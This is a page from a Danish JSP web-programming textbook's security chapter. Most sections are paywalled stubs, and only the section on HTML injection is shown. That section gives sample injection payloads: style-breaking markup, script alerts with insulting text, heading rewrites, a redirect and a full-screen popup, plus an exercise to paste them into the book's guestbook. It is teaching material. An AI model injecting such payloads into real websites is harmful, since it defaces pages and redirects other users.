javabog.dk | << forrige | indhold | næste >> | programeksempler | om bogen
8 Sikkerhed og
adgangskontrol
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.1 Kryptering
og SSL
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.1.1 I gang med HTTPS
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.1.2 HTTPS-standardporten
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.2 Adgangskontrol
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.2.1 Containerstyret adgangskontrol
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.2.2 Hurtigt i gang med adgangskontrol
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.3 Datakilder til adgangskontrol
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.3.1 Brugerdata fra tekstfil
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.3.2 Andre datakilder
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.3.3 Brugerdata fra database
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.4 Former for
brugeridentifikation
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.4.1 Kryptering af brugerdata
(transportgarantier)
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.4.2 Eksempel: Formularbaseret login
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.5 Sikkerhed i
en webapplikation
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.5.1 HTML-injektion
HTML-injektion (eng.: HTML injection) går ud
på at forstyrre eller ændre en websides udseende ved at
sende en forespørgsel med noget HTML, som websiden så
ukritisk viser for andre brugere.
Her er et eksempel på, hvad angribere kunne
forsøge at injicere:
Bryd ud af stilen og lav
den efterfølgende tekst meget svær at læse:
Du
er <h1>lam i roen</h1><font size="-5"
color="lightgrey">
JavaScript med advarselsvindue, der dukker op
når siden indlæses:
<script>alert("Forfatteren
af denne side er alvorligt hjerneskadet.\nOg det er du også,
hvis du tror på sådan noget pis.");</script>
Erstat første
overskrift på siden med ny tekst:
<script>var
overskrift =
document.getElementsByTagName('H1')[0];
overskrift.innerHTML="ADVARSEL:
Forfatteren af denne side er alvorligt hjerneskadet.\nOg det er du
også, hvis du tror på sådan noget pis. ";</script>
Omdirigér til en
helt anden side
(porno.dk):
<script>document.location="http://porno.dk"</script>
Lav et popup-vindue, der
fylder hele
skærmen:
<script>window.open("http://porno.dk","_new","width=10000,height=10000,screenX=0,screenY=0,alwaysRaised=yes,screenX=-10,screenY=-10")</script>
Øvelse
Åbn gæstebogen eller (fælleskalenderen
fra kapitel 9) og skriv et par almindelige beskeder.
(gæstebogen kan findes på
http://javabog.dk:8080/JSP/kode/kapitel_05/gaestebog.jsp,
fælleskalenderen på
http://javabog.dk:8080/JSP/kode/kapitel_09/kalender.jsp
- ellers så kør din egen kopi).
Prøv derefter at kopiere en af ovenstående
indlæg ind i meddelelsen.
Ovenstående afsnit er ikke omfattet af Åben Dokumentslicens, men af de almindelige regler omkring ophavsretsret.
8.5.2 SQL-injektion
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.5.3 Cross-site scripting (XSS) og
sessionskapring
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.5.4 Eksempel på sessionskapring
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.5.5 Måder at beskytte sig mod
sessionskapring
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.5.6 Bortfiltrering af ulovlige tegn
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.5.7 Opgave: Lave en sikker gæstebog
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
8.5.8 Løsning: Sikker gæstebog
Dette afsnit er ikke omfattet af Åben Dokumentslicens.
Du skal købe bogen for at
måtte læse dette afsnit.
javabog.dk | << forrige | indhold | næste >> | programeksempler | om bogen
http://javabog.dk/ - Webprogrammering med Java Server Pages af Jacob Nordfalk.
Licens og kopiering under Åben Dokumentlicens (ÅDL)
hvor intet andet er nævnt (72% af værket).
Ønsker du at se de sidste 28% af dette værk (275315 tegn)
skal du købe bogen. Så får du pæne figurer og layout, stikordsregister og en trykt bog med i købet.